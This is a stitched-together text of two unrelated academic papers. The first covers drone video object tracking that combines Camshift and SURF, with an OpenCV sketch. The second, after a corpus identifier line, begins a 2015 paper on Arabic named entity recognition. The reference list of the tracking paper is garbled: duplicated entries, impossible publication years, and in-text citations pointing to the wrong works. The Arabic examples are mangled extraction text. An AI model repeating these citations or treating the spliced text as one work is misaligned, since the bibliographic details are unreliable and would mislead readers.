The current mainstream motion object tracking methods with good tracking performance mainly include feature-based tracking methods, region-based tracking methods, model-based tracking methods, motion estimation-based tracking methods, and contour-based tracking methods. The detection and tracking algorithms of conventional motion objects are only suitable for scenes with a static or almost static background, and are not suitable for the detection and tracking of moving objects in UAV video. Therefore, the digital sequence information of the video images acquired by the drone should meet real-time, accuracy, robustness and other requirements [2].

DOI: 10.21307/ijanmc-2019-028

Current research shows that the target object tracking method based on the Camshift algorithm can meet the requirements of drone video target tracking. The CamShift algorithm performs target object recognition and tracking by analyzing the Hue component information of the target region in the HSV color space. The target has low deformation sensitivity, and the algorithm has good real-time performance, little computation and low complexity; therefore it has been extensively studied. In drone video target tracking, the Camshift algorithm [3], compared to other tracking methods, has both advantages and disadvantages. Under conditions such as a background color similar to that of the target object, or a complicated scene, the Camshift algorithm may produce tracking errors or fail to track, because the algorithm relies on the color information of the moving object. If other auxiliary features of the object can be obtained during the search process and the input conditions of the algorithm are specified, it is possible to make up for the problems caused by Camshift in such scenes. Because the SURF algorithm has the advantage of good object recognition, implementing Speeded Up Robust Features (SURF) in the Camshift algorithm will greatly improve the tracking accuracy and the tracking reliability of the object. The improved method preserves the good real-time performance of the tracking, greatly improves the tracking accuracy of the object by the UAV, and eventually achieves a better tracking effect for the moving object.

II. THE CHARACTERISTICS OF SURF

The tracking of the characteristics of the target object is based on the tracking of points of interest, which is often used in engineering applications and works well. The difficulty of this method lies in the selection and extraction of features [4]. The selected features should fully cover the key features of the target object in different scene settings, and such features should also be convenient to extract. In general, if the number of sampling points is insufficient in the process of extracting features, it is easy to lose track of the object and the tracking effect deteriorates. On the contrary, the calculation amount and complexity will be greatly increased, and the practical application cannot be satisfied. Although the Harris corner detection method is a traditional point of interest detection method, due to its fixed scale characteristics it becomes difficult to determine the change of position of the target object between image frames when the target object is deformed or changes in size. Prof. David G.
Lowe of the University of British Columbia in Canada first proposed the Scale Invariant Feature Transform (SIFT) [5]. The SIFT algorithm queries feature key points by performing feature detection within a constructed scale space. The orientation of each point of interest is selected according to the gradient of its neighborhood, so that the feature within a scale does not change with orientation. However, the algorithm has high computational complexity, places high requirements on hardware devices, and suffers from poor real-time performance. On the basis of this algorithm, Yan Ke et al. introduced Principal Components Analysis (PCA) into the SIFT system and proposed the PCA-SIFT algorithm, which markedly improved on the matching inefficiency of the common SIFT algorithm. However, this method can lead to the failure of feature extraction in later stages as well as a deterioration of the distinctiveness of the features. On this basis, a point of interest algorithm based on SURF was proposed [6]. The extracted features are used as the key local features of the images. The speed of the calculation is improved by the integral image method. The points of interest obtained by the Haar wavelet transform are then used to obtain the main orientation and the feature vector [7]. Finally, the Euclidean metric is calculated to verify the matching effect between the images. The SURF feature is invariant in the presence of changes in brightness, translation, rotation, and scale. In addition, the method does not show any negative effect on its robustness under noise interference, even if the viewing angle changes. This method not only realizes accurate feature recognition, but also reduces the computational complexity, which greatly improves the efficiency of the method in use, and it has broad application.

III. THE SURF ALGORITHM

A. Constructing the Hessian matrix

SURF relies on an approximation of the determinant images of the Hessian matrix. The Hessian matrix is the core of the SURF algorithm [8]. First, the Hessian matrix of each pixel is calculated according to the equation, and then the Hessian matrix discriminant is used to determine whether the point is an extremum. Gaussian filtering is used to construct the Gaussian pyramid [9]. Compared with the Gaussian pyramid construction process of the SIFT algorithm, the speed of the SURF algorithm is improved. In the SIFT algorithm, the image space occupancy of each set is different: the previous set of images is downsampled by 1/4 to obtain the next scale, while images within the same set have the same size and differ only in the scale σ used. In addition, in the blurring process the Gaussian template size is always constant and only the scale σ changes. For the SURF algorithm, the image size remains the same; only the Gaussian blur template size and the scale σ need to be changed.

B. Preliminary determination of points of interest using non-maximum suppression

Each pixel processed by the Hessian matrix is compared with the 26 points in its three-dimensional neighborhood. If it is the extremum among these points, it is selected as a preliminary point of interest for the next step [10]. The detection process uses a filter whose size corresponds to the scale of the image. In this paper, a 3×3 filter is used as an example for the detection analysis.
The candidate point of interest is compared with the remaining 8 points in its own scale layer and with the 9 pixel points in each of the two adjacent scale layers above and below it, which completes the comparison against 26 points in the three-dimensional neighborhood.

C. Precisely locating the extremum

Sub-pixel points of interest are obtained by three-dimensional linear interpolation, and points whose values are less than a certain threshold are removed. Raising this threshold increases the required extremum strength, so the number of detected points of interest is reduced; finally, only a few strongly characteristic points are detected and the amount of work is reduced [11].

D. Selecting the main orientation of the point of interest

In order to ensure rotational invariance, SURF does not compute a gradient histogram; instead, the Haar wavelet responses around the region of the point of interest are computed [12]. That is, centering on the point of interest, within a circular neighborhood of radius 6s (where s is the scale of the point of interest) and with a Haar wavelet side length of 4s, the Haar wavelet responses of all points within a 60-degree fan are computed in both the x- and y-directions. The responses are summed, and a Gaussian weight coefficient is assigned to the Haar wavelet responses so as to increase the contribution of responses close to the point of interest and suppress the contribution of responses far from it. The responses within the 60-degree window are then added, eventually yielding a new vector, and the whole circular region is traversed. The main orientation of the point of interest is defined by the orientation of the longest such vector [13].

E. Constructing the descriptor of the SURF point of interest [14]

A square region is extracted around the point of interest. The size of the window is 20s, and the orientation of the region is the main orientation detected in the previous step. The region is then divided into 16 sub-regions, in each of which the Haar wavelet responses in the x- and y-directions of 25 pixels are summed, where the x- and y-directions are taken relative to the main orientation. The Haar wavelet response consists of the sum in the horizontal direction, the sum of the absolute values in the horizontal direction, the sum in the vertical direction, and the sum of the absolute values in the vertical direction.

IV. EXTRACT AND MATCH THE POINTS OF INTEREST

(1) Select a frame from the drone tracking video and extract the points of interest using the SURF detection method, as shown in Figure 1.

Figure 1. Extract points of interest

(2) Match the target region. After selecting the target region, extract the target regions in two adjacent frames and match the points of interest of the two frames. In Figure 2, it can be seen that 6 points of interest are successfully matched.

Figure 2. Matching the points of interest

V. VERIFICATION

After manually selecting the target window, a feedback mechanism is used to calculate the color similarity between the Camshift tracking window and the initial window, and the feature similarity between the SURF tracking window and the initial window. Large displacements are suppressed, and the displacement weight is assigned dynamically to the two tracking algorithms in accordance with the Bhattacharyya distance [15]. The Camshift tracking algorithm is preferred when the motion tracking is stable; otherwise, the SURF tracking method [16] is preferred.
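As an illustration of how such a combination can be wired up with off-the-shelf tools, the sketch below uses OpenCV: CamShift runs on the hue back-projection of the selected window, and the Bhattacharyya distance between the current and initial hue histograms serves as the stability check that decides when to fall back to feature matching. This is only a schematic reading of the verification step, not the authors' code; the threshold value is a placeholder, and SURF itself requires the opencv-contrib build (cv2.xfeatures2d), so ORB or another detector may have to stand in for it.

    import cv2

    def hue_histogram(frame_bgr, window):
        x, y, w, h = window
        roi = frame_bgr[y:y + h, x:x + w]
        hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
        hist = cv2.calcHist([hsv], [0], None, [180], [0, 180])
        return cv2.normalize(hist, hist, 0, 255, cv2.NORM_MINMAX)

    def track(video_path, init_window, bhatta_threshold=0.6):
        cap = cv2.VideoCapture(video_path)
        ok, frame = cap.read()
        init_hist = hue_histogram(frame, init_window)
        window = init_window
        term = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
        while True:
            ok, frame = cap.read()
            if not ok:
                break
            hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
            backproj = cv2.calcBackProject([hsv], [0], init_hist, [0, 180], 1)
            rot_box, window = cv2.CamShift(backproj, window, term)
            # Stability check: Bhattacharyya distance between current and initial hue histograms.
            dist = cv2.compareHist(init_hist, hue_histogram(frame, window),
                                   cv2.HISTCMP_BHATTACHARYYA)
            if dist > bhatta_threshold:
                # Tracking looks unstable: a feature-based step (e.g. SURF/ORB matching
                # against the initial window) would be used here to re-locate the target.
                pass
        cap.release()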
The experiments show that the tracking method performs well and can solve the problem of tracking interference caused by background changes and object similarity. A picture of the tracked object is taken every 15 seconds; examples are shown in Figures 3, 4, 5, and 6.

Figure 3. Tracking image 1

Figure 4. Tracking image 2

Figure 5. Tracking image 3

Figure 6. Tracking image 4

As shown in Figures 3, 4, 5, and 6 above, the drone achieves good results in tracking the moving object.

VI. CONCLUSION

Based on the classic Camshift tracking algorithm and focusing on the deficiencies of the algorithm in the motion object tracking of drone video, this paper proposes the combination of the Camshift algorithm and SURF feature detection to realize the tracking of a moving object in UAV video. The experimental results show that the proposed method can effectively track and locate the target object against a more complex aerial photography background. The experiment achieved good results, basically realizing the tracking of the moving object; the tracking speed is fast, so the real-time performance is satisfactory and the time consumption is small. However, in practical applications, the environment of object tracking is more complicated and diverse. Further study of this work can be carried out in the following respects. This paper only studied the tracking of a single object and does not involve the tracking of multiple similar objects; multi-object tracking has practical significance in video surveillance, intelligent traffic detection, air formation, and geographic monitoring, so it is very necessary to further study the tracking of multiple objects. The object tracking system in this paper also needs to be improved, including optimization of the logic system and the addition of parallel processing to improve the tracking efficiency of the system. Finally, the Camshift algorithm in this paper is still based on a color histogram, which is sensitive to changes in illuminance and to changes in the color of objects; when the resolution of the camera is not high and the ambient light is insufficient, the tracking effect is not good, and therefore further study should focus on tracking physical features that are insensitive to illumination.

REFERENCES
[1] Liu Yanli, Tang Xianqi, Chen Yuedong. Application research of moving target tracking algorithm based on improved Camshift [J]. Journal of Anhui Polytechnic University, 2012, 27(2): 74-77.
[2] Xiong Tan, Xuchu Yu, Jingzheng Liu, Weijie Huang. Object Fast Tracking Based on Unmanned Aerial Vehicle Video [C]// Proceedings of PACIIA, IEEE Press, 2010: 244-248.
[3] C. Harris, M. J. Stephens. A Combined Corner and Edge Detector [C]. Proc. of the 4th Alvey Vision Conf, 2013: 147-152.
[4] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints [J]. International Journal of Computer Vision, 2014, 60(2): 91-110.
[5] C. Harris, M. J. Stephens. A Combined Corner and Edge Detector [C]. Proc. of the 4th Alvey Vision Conf, 2015: 147-152.
[6] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints [J]. International Journal of Computer Vision, 2014, 60(2): 91-110.
[7] Liu Yawei. Review of target detection and tracking methods in UAV aerial photography video [J]. Airborne Missile, 2016, (9): 53-56.
[8] Yan K, Sukthankar R. A more distinctive representation for local image descriptors [C]// Proceedings of CVPR, Los Alamitos: IEEE Press, 2014: 268-235.
[9] Bay H, Ess A, Tuytelaars T. Speeded up robust features (SURF) [J]. Computer Vision and Image Understanding, 2007, 110(3): 346-359.
[10] Leutenegger S, Chli M, Siegwart R. BRISK: binary robust invariant scalable keypoints [C]// Proceedings of ICCV, IEEE Press, 2013: 326-329.
[11] Cui Zhe. Image feature point extraction and matching based on SIFT algorithm [D]. Xi'an: Xidian University, 2016: 38-46.
[12] Yu Huai, Yang Wen. A fast feature extraction and matching algorithm for UAV aerial images [J]. Journal of Electronics and Information Technology, 2016, 38(3): 509-516.
[13] Wang Jianxiong. Research on key technologies of low altitude photogrammetry of unmanned airship and practice of large scale map formation [D]. Xi'an: Chang'an University, 2011: 36-48.
[14] Li Yifei. Research on PID control in four-rotor aircraft [J]. Technology and Market, 2016, 07: 90-91.
[15] Li Xiang, Wang Yongjun, Li Zhi. Misalignment error and correction of attitude system vector sensor [J]. Journal of Sensor Technology, 2017, 02: 266-271.
[16] Wang Donghua, Yue Dawei. Design and implementation of large remote sensing image correction effect detection system [J]. Computer Programming Skills and Maintenance, 2015, 12: 118-120.
work_2sn25vxvsrbzrjcp6ps7nehcte ----
Combining Minimally-supervised Methods for Arabic Named Entity Recognition
Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio
School of Computer Science and Electronic Engineering, University of Essex, Colchester, UK
{mjaltha, udo, poesio}@essex.ac.uk

Abstract

Supervised methods can achieve high performance on NLP tasks, such as Named Entity Recognition (NER), but new annotations are required for every new domain and/or genre change. This has motivated research in minimally supervised methods such as semi-supervised learning and distant learning, but neither technique has yet achieved performance levels comparable to those of supervised methods. Semi-supervised methods tend to have very high precision but comparatively low recall, whereas distant learning tends to achieve higher recall but lower precision. This complementarity suggests that better results may be obtained by combining the two types of minimally supervised methods. In this paper we present a novel approach to Arabic NER using a combination of semi-supervised and distant learning techniques.
We trained a semi-supervised NER classifier and another one using distant learning techniques, and then combined them using a variety of classifier combination schemes, including the Bayesian Classifier Combination (BCC) procedure recently proposed for sentiment analysis. According to our results, the BCC model leads to an increase in performance of 8 percentage points over the best base classifiers.

Transactions of the Association for Computational Linguistics, vol. 3, pp. 243–255, 2015. Action Editor: Ryan McDonald. Submission batch: 1/2015; Revision batch 4/2015; Published 5/2015. © 2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license.

1 Introduction

Supervised learning techniques are very effective and widely used to solve many NLP problems, including NER (Sekine and others, 1998; Benajiba et al., 2007a; Darwish, 2013). The main disadvantage of supervised techniques, however, is the need for a large annotated corpus. Although a considerable amount of annotated data is available for many languages, including Arabic (Zaghouani, 2014), changing the domain or expanding the set of classes always requires domain-specific experts and new annotated data, both of which demand time and effort. Therefore, much of the current research on NER focuses on approaches that require minimal human intervention to export the named entity (NE) classifiers to new domains and to expand NE classes (Nadeau, 2007; Nothman et al., 2013).

Semi-supervised (Abney, 2010) and distant learning approaches (Mintz et al., 2009; Nothman et al., 2013) are alternatives to supervised methods that do not require manually annotated data. These approaches have proved to be effective and easily adaptable to new NE types. However, the performance of such methods tends to be lower than that achieved with supervised methods (Althobaiti et al., 2013; Nadeau, 2007; Nothman et al., 2013).

We propose combining these two minimally supervised methods in order to exploit their respective strengths and thereby obtain better results. Semi-supervised learning tends to be more precise than distant learning, which in turn leads to higher recall than semi-supervised learning. In this work, we use various classifier combination schemes to combine the minimal supervision methods. Most previous studies have examined classifier combination schemes to combine multiple supervised-learning systems (Florian et al., 2003; Saha and Ekbal, 2013), but this research is the first to combine minimal supervision approaches. In addition, we report our results from testing the recently proposed Independent Bayesian Classifier Combination (IBCC) scheme (Kim and Ghahramani, 2012; Levenberg et al., 2014) and comparing it with traditional voting methods for ensemble combination.

2 Background

2.1 Arabic NER

A lot of research has been devoted to Arabic NER over the past ten years. Much of the initial work employed hand-written rule-based techniques (Mesfar, 2007; Shaalan and Raza, 2009; Elsebai et al., 2009). More recent approaches to Arabic NER are based on supervised learning techniques. The most common supervised learning techniques investigated for Arabic NER are Maximum Entropy (ME) (Benajiba et al., 2007b), Support Vector Machines (SVMs) (Benajiba et al., 2008), and Conditional Random Fields (CRFs) (Benajiba and Rosso, 2008; Abdul-Hamid and Darwish, 2010).
Darwish (2013) presented cross-lingual features for NER that make use of the linguistic properties and knowledge bases of another language. In his study, English capitalisation features and an English knowledge base (DBpedia) were exploited as dis- criminative features for Arabic NER. A large Ma- chine Translation (MT) phrase table and Wikipedia cross-lingual links were used for translation between Arabic and English. The results showed an overall F-score of 84.3% with an improvement of 5.5% over a strong baseline system on a standard dataset (the ANERcorp set collected by Benajiba et al. (2007a)). Abdallah et al. (2012) proposed a hybrid NER system for Arabic that integrates a rule-based sys- tem with a decision tree classifier. Their inte- grated approach increased the F-score by between 8% and 14% when compared to the original rule based system and the pure machine learning tech- nique. Oudah and Shaalan (2012) also developed hybrid Arabic NER systems that integrate a rule- based approach with three different supervised tech- niques: decision trees, SVMs, and logistic regres- sion. Their best hybrid system outperforms state-of- the-art Arabic NER systems (Benajiba and Rosso, 2008; Abdallah et al., 2012) on standard test sets. 2.2 Minimal Supervision and NER Much current research seeks adequate alternatives to expensive corpus annotation that address the limita- tions of supervised learning methods: the need for substantial human intervention and the limited num- ber of NE classes that can be handled by the system. Semi-supervised techniques and distant learning are examples of methods that require minimal supervi- sion. Semi-supervised learning (SSL) (Abney, 2010) has been used for various NLP tasks, including NER (Nadeau, 2007). ‘Bootstrapping’ is the most com- mon semi-supervised technique. Bootstrapping in- volves a small degree of supervision, such as a set of seeds, to initiate the learning process (Nadeau and Sekine, 2007). An early study that introduced mutual bootstrapping and proved highly influential is (Riloff and Jones, 1999). They presented an al- gorithm that begins with a set of seed examples of a particular entity type. Then, all contexts found around these seeds in a large corpus are compiled, ranked, and used to find new examples. Pasca et al. (2006) used the same bootstrapping technique as Riloff and Jones (1999), but applied the technique to very large corpora and managed to generate one million facts with a precision rate of about 88%. Ab- delRahman et al. (2010) proposed to integrate boot- strapping semi-supervised pattern recognition and a Conditional Random Fields (CRFs) classifier. They used semi-supervised pattern recognition in order to generate patterns that were then used as features in the CRFs classifier. Distant learning (DL) is another popular paradigm that avoids the high cost of supervision. It depends on the use of external knowledge (e.g., encyclopedias such as Wikipedia, unlabelled large corpora, or external semantic repositories) to increase the performance of the classifier, or to automatically create new resources for use in the learning process (Mintz et al., 2009; Nguyen and Moschitti, 2011). Nothman et al. (2013) automatically created massive, multilingual training annotations for NER by exploiting the text and in- ternal structure of Wikipedia. They first categorised Wikipedia articles into a specific set of named entity types across nine languages: Dutch, English, French, German, Italian, Polish, Portuguese, Rus- 244 sian, and Spanish. 
Then, Wikipedia’s links were transformed into named entity annotations based on the NE types of the target articles. Following this approach, millions of words were annotated in the aforementioned nine languages. Their method for automatically deriving corpora from Wikipedia outperformed the methods proposed by Richman and Schone (2008) and Mika et al. (2008) when testing the Wikipedia-trained models on CONLL shared task data and other gold-standard corpora. Alotaibi and Lee (2013) presented a methodology to automatically build two NE-annotated sets from Arabic Wikipedia. The corpora were built by transforming links into NE annotations according to the NE type of the target articles. POS-tagging, morphological analysis, and linked NE phrases were used to detect other mentions of NEs that appear without links in text. Their Wikipedia-trained model performed well when tested on various newswire test sets, but it did not surpass the performance of the supervised classifier that is trained and tested on data sets drawn from the same domain. 2.3 Classifier Combination and NER We are not aware of any previous work combin- ing minimally supervised methods for NER task in Arabic or any other natural language, but there are many studies that have examined classifier com- bination schemes to combine various supervised- learning systems. Florian et al. (2003) presented the best system at the NER CoNLL 2003 task, with an F-score value equal to 88.76%. They used a combination of four diverse NE classifiers: the transformation-based learning classifier, a Hidden Markov Model classifier (HMM), a robust risk min- imization classifier based on a regularized winnow method (Zhang et al., 2002), and a ME classifier. The features they used included tokens, POS and chunk tags, affixes, gazetteers, and the output of two other NE classifiers trained on richer datasets. Their methods for combining the results of the four NE classifiers improved the overall performance by 17- 21% when compared with the best performing clas- sifier. Saha and Ekbal (2013) studied classifier combi- nation techniques for various NER models under single and multi-objective optimisation frameworks. They used seven diverse classifiers - naive Bayes, decision tree, memory based learner, HMM, ME, CRFs, and SVMs - to build a number of voting mod- els based on identified text features that are selected mostly without domain knowledge. The combina- tion methods used were binary and real vote-based ensembles. They reported that the proposed multi- objective optimisation classifier ensemble with real voting outperforms the individual classifiers, the three baseline ensembles, and the corresponding sin- gle objective classifier ensemble. 3 Two Minimally Supervised NER Classifiers Two main minimally supervised approaches have been used for NER: semi-supervised learning (Al- thobaiti et al., 2013) and distant supervision (Noth- man et al., 2013). We developed state-of-the-art classifiers of both types that will be used as base classifiers in this paper. Our implementations of these classifiers are explained in Section 3.1 and Section 3.2. 3.1 Semi-supervised Learning As previously mentioned, the most common SSL technique is bootstrapping, which only requires a set of seeds to initiate the learning process. We used an algorithm adapted from Althobaiti et al. (2013) and contains three components, as shown in Figure 1. Pattern Induction Instance Extraction Instance Ranking/Selection Seed Instances Figure 1: The Three Components of SSL System. 
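To make the pipeline of Figure 1 concrete, the sketch below shows one plausible shape of the bootstrapping loop. The helper functions (induce_patterns, match_pattern) and data structures are hypothetical placeholders rather than the authors' code; the ranking criterion (pattern variety instead of raw frequency) and the top-m selection rule follow the description given in the next paragraphs.

```python
# Minimal sketch of the three components in Figure 1 (illustrative only).
def bootstrap_entities(seeds, corpus, iterations=10):
    """Grow a list of named entities of one type from a handful of seeds."""
    instances = set(seeds)
    m = len(seeds)
    for _ in range(iterations):
        # Pattern induction: contexts observed around the current instances.
        patterns = induce_patterns(instances, corpus)        # hypothetical helper
        # Instance extraction: apply each pattern and remember which distinct
        # patterns extracted each candidate entity.
        extracted_by = {}                                    # candidate -> set of patterns
        for p in patterns:
            for candidate in match_pattern(p, corpus):       # hypothetical helper
                extracted_by.setdefault(candidate, set()).add(p)
        # Ranking/selection: rank by pattern variety and keep only the top m+1
        # candidates as the seed set for the next iteration.
        ranked = sorted(extracted_by, key=lambda c: len(extracted_by[c]), reverse=True)
        m += 1
        instances = set(ranked[:m])
    return instances
```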
The algorithm begins with a list of a few exam- ples of a given NE type (e.g., ‘London’ and ‘Paris’ can be used as seed examples for location entities) and learns patterns (P) that are used to find more ex- amples (candidate NEs). These examples are even- tually sorted and used again as seed examples for the next iteration. Our algorithm does not use plain frequencies since absolute frequency does not always produce good examples. This is because bad examples will be extracted by one pattern, however unwantedly, as many times as the bad examples appear in the text in relatively similar contexts. Meanwhile, good exam- 245 ples are best extracted using more than one pattern, since they occur in a wider variety of contexts in the text. Instead, our algorithm ranks candidate NEs ac- cording to the number of different patterns that are used to extract them, since pattern variety is a better cue to semantics than absolute frequency (Baroni et al., 2010). After sorting the examples according to the num- ber of distinct patterns, all examples but the top m are discarded, where m is set to the number of ex- amples from the previous iteration, plus one. These m examples will be used in the next iteration, and so on. For example, if we start the algorithm with 20 seed instances, the following iteration will start with 21, and the next one will start with 22, and so on. This procedure is necessary in order to carefully include examples from one iteration to another and to ensure that bad instances are not passed on to the next iteration. The same procedure was applied by (Althobaiti et al., 2013). 3.2 Distant Learning For distant learning we follow the state of the art ap- proach to exploit Wikipedia for Arabic NER, as in (Althobaiti et al., 2014). Our distant learning sys- tem exploits many of Wikipedia’s features, such as anchor texts, redirects, and inter-language links, in order to automatically develop an Arabic NE anno- tated corpus, which is used later to train a state-of- the-art supervised classifier. The three steps of this approach are: 1. Classify Wikipedia articles into a set of NE types. 2. Annotate the Wikipedia text as follows: • Identify and label matching text in the title and the first sentence of each article. • Label linked phrases in the text according to the NE type of the target article. • Compile a list of alternative titles for articles and filter out ambiguous ones. • Identify and label matching phrases in the list and the Wikipedia text. 3. Filter sentences to prevent noisy sentences from being included in the corpus. We briefly explain these steps in the following sec- tions. 3.2.1 Classifying Wikipedia Articles The Wikipedia articles in the dataset need to be classified into the set of named entity types in the classification scheme. We conduct an experiment that uses simple bag-of-words features extracted from different portions of the Wikipedia document and metadata such as categories, the infobox ta- ble, and tokens from the article title and first sen- tence of the document. To improve the accuracy of document classification, tokens are distinguished based on their location in the document. There- fore, categories and infobox features are marked with suffixes to differentiate them from tokens ex- tracted from the article’s body text (Tardif et al., 2009). The feature set is represented by Term Frequency-Inverse Document Frequency (TF-IDF). 
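As an illustration of the document-classification step just described, the sketch below builds a TF-IDF bag-of-words representation in which category and infobox tokens carry a marking suffix, and feeds it to a linear classifier. The article fields, the suffix names, and the choice of a linear SVM are illustrative assumptions, not details taken from the paper.

```python
# Sketch: TF-IDF classification of Wikipedia articles into NE types.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.pipeline import make_pipeline

def article_to_text(article):
    # `article` is assumed to be a dict with these fields (illustrative only).
    body = " ".join([article["title"], article["first_sentence"], article["body"]])
    cats = " ".join(tok + "_CAT" for tok in article["category_tokens"])
    info = " ".join(tok + "_INFO" for tok in article["infobox_tokens"])
    return " ".join([body, cats, info])

def train_article_classifier(articles, labels):
    """labels: person / location / organisation / miscellaneous / other."""
    clf = make_pipeline(TfidfVectorizer(), LinearSVC())
    clf.fit([article_to_text(a) for a in articles], labels)
    return clf
```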
In order to develop a Wikipedia document classifier to categorise Wikipedia documents into CoNLL NE types, namely person, location, organisation, mis- cellaneous, or other, we use a set of 4,000 manually classified Wikipedia articles that are available free online (Alotaibi and Lee, 2012). 80% of the 4,000 hand-classified Wikipedia articles are used for train- ing, and 20% for evaluation. The Wikipedia docu- ment classifier that we train performs well, achiev- ing an F-score of 90%. The classifier is then used to classify all Wikipedia articles. At the end of this stage, we obtain a list of pairs containing each Wikipedia article and its NE Type in preparation for the next stage: developing the NE-tagged training corpus. 3.2.2 The Annotation Process To begin the Annotation Process we identify matching terms in the article title and the first sen- tence and then tag the matching phrases with the NE-type of the article. The system adopts partial matching where all corresponding words in the ti- tle and the first sentence should first be identified. Then, the system annotates them and all words in between (Althobaiti et al., 2014). The next step is to transform the links between Wikipedia articles into NE annotations according to the NE-type of the link target. Wikipedia also contains a fair amount of NEs without links. We follow the technique proposed by Nothman et al. (2013), which suggests inferring additional links using the aliases for each article. 246 Thus, we compile a list of alternative titles, in- cluding anchor texts and NE redirects (i.e., the linked phrases and redirected pages that refer to NE articles). It is necessary to filter the list, however, to remove noisy alternative titles, which usually appear due to (a) one-word meaningful named entities that are ambiguous when taken out of context and (b) multi-word alternative titles that contain apposition words (e.g., ‘President’, ‘Vice Minister’). To this end we use the filtering algorithm proposed by Althobaiti et al. (2014) (see Algorithm 1). In this algorithm a capitalisation probability measure for Arabic is introduced. This involves finding the English gloss for each one-word alternative name and then computing its probability of being capitalised in the English Wikipedia. In order to find the English gloss for Arabic words, Wikipedia Arabic-to-English cross-lingual links are exploited. In case the English gloss for the Arabic word could not be found using inter-language links, an online translator is used. Before translating the Arabic word, a light stemmer is used to remove prefixes and conjunctions in order to acquire the translation of the word itself without its associated affixes. The capitalisation probability is computed as follows Pr[EN] = f(EN)isCapitalised f(EN)isCapitalised+f(EN)notCapitalised where EN is the English gloss of the alterna- tive name; f(EN)isCapitalised is the number of times the English gloss EN is capitalised in the English Wikipedia; and f(EN)notCapitalised is the number of times the English gloss EN is not capitalised in the English Wikipedia. By specifying a capitalisation threshold constraint, ambiguous one-word titles are prevented from being included in the list of alternative titles. The capitalisation threshold is set to 0.75 as suggested in (Althobaiti et al., 2014). The multi-word alternative name is also omitted if any of its words belong to the list of apposition words. 3.2.3 Building The Corpus The last stage is to incorporate sentences into the final corpus. 
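One detail worth pinning down before looking at the resulting corpus is the capitalisation-probability filter used in the annotation step above. The sketch below assumes precomputed capitalised/uncapitalised counts from the English Wikipedia and a translation helper; both are hypothetical stand-ins for the resources described in the text.

```python
# Sketch of the capitalisation-probability filter for one-word alternative titles:
# Pr[EN] = f_cap(EN) / (f_cap(EN) + f_nocap(EN)); keep the title if Pr[EN] > 0.75.
def capitalisation_probability(english_gloss, cap_counts, nocap_counts):
    cap = cap_counts.get(english_gloss, 0)
    nocap = nocap_counts.get(english_gloss, 0)
    if cap + nocap == 0:
        return 0.0                 # unseen gloss: treat as unreliable
    return cap / (cap + nocap)

def keep_one_word_title(arabic_title, translate, cap_counts, nocap_counts,
                        threshold=0.75):
    # `translate` stands in for the inter-language-link lookup, falling back to
    # an online translator after light stemming, as described above.
    gloss = translate(arabic_title)
    return capitalisation_probability(gloss, cap_counts, nocap_counts) > threshold
```

The corpus that results from the full annotation and filtering pipeline is described next.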
We refer to this dataset as the Wikipedia-derived corpus (WDC). It contains 165,119 sentences of around 6 million tokens. Our model was then trained on the WDC corpus. In this Algorithm 1: Filtering Alternative Names Input: A set L = {l1, l2, . . . , ln} of all alternative names of Wikipedia articles Output: A set RL = {rl1, rl2, . . . , rln} of reliable alternative names 1 for i ← 1 to n do 2 T ← split li into tokens 3 if (T.size() >= 2) then /* All tokens of T do not belong to apposition list */ 4 if (! containAppositiveWord(T)) then 5 add li to the set RL 6 else 7 lightstem ← findLightStem(li) 8 englishgloss ← translate(lightstem) /* Compute Capitalisation Probability for English gloss */ 9 capprob ← compCapProb(englishgloss) 10 if (capprob > 0.75) then 11 add li to the set RL paper we refer to this model as the DL classifier. The WDC dataset is available online1. We also plan to make the models available to the research community. 4 Classifier Combination 4.1 The Case for Classifier Combination In what follows we use SSL to refer to our semi- supervised classifier (see Section 3.1) and DL to re- fer to our distant learning classifier (see Section 3.2). Table 1 shows the results of both classifiers when tested on the ANERcorp test set (see Section 5 for details about the dataset). NEs Classifiers Precision Recall Fβ=1 PER SSL 85.91 51.10 64.08 DL 80.01 45.11 57.69 LOC SSL 87.91 62.48 73.04 DL 75.21 67.14 70.95 ORG SSL 84.27 40.30 54.52 DL 74.10 57.02 64.45 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 1: The results of SSL and DL classifiers on the ANERcorp test set. As is apparent in Table 1, the SSL classifier tends to be more precise at the expense of recall. The dis- 1 https://sites.google.com/site/mahajalthobaiti/resources 247 https://sites.google.com/site/mahajalthobaiti/resources tant learning technique is lower in precision than the semi-supervised learning technique, but higher in re- call. Generally, preference is given to the distant su- pervision classifier in terms of F-score. The classifiers have different strengths. Our semi- supervised algorithm iterates between pattern ex- traction and candidate NEs extraction and selection. Only the candidate NEs that the classifier is most confident of are added at each iteration, which re- sults in the high precision. The SSL classifier per- forms better than distant learning in detecting NEs that appear in reliable/regular patterns. These pat- terns are usually learned easily during the training phase, either because they contain important NE in- dicators2 or because they are supported by many re- liable candidate NEs. For example, the SSL classi- fier has a high probability to successfully detect AÓ AK. ð @ “Obama” and È A g à A ̄ �� ñË “Louis van Gaal” as per- son names in the following sentences: • . . . AJ K A¢� QK. P ð QK ø YË @ AÓ AK. ð @ �� KQË @ h �Qå� “President Obama said on a visit to Britain ...” • . . . à @ YJ ��K A KñK Q��� �� � AÓ H. P YÓ È A g à A ̄ �� ñË È A�̄ “Louis van Gaal the manager of Manchester United said that ...” The patterns extracted from such sentences in the newswire domain are learned easily during the train- ing phase, as they contain good NE indicators like �� KQË @ “president” and H. P YÓ “manager”. Our distant learning method relies on Wikipedia structure and links to automatically create NE anno- tated data. 
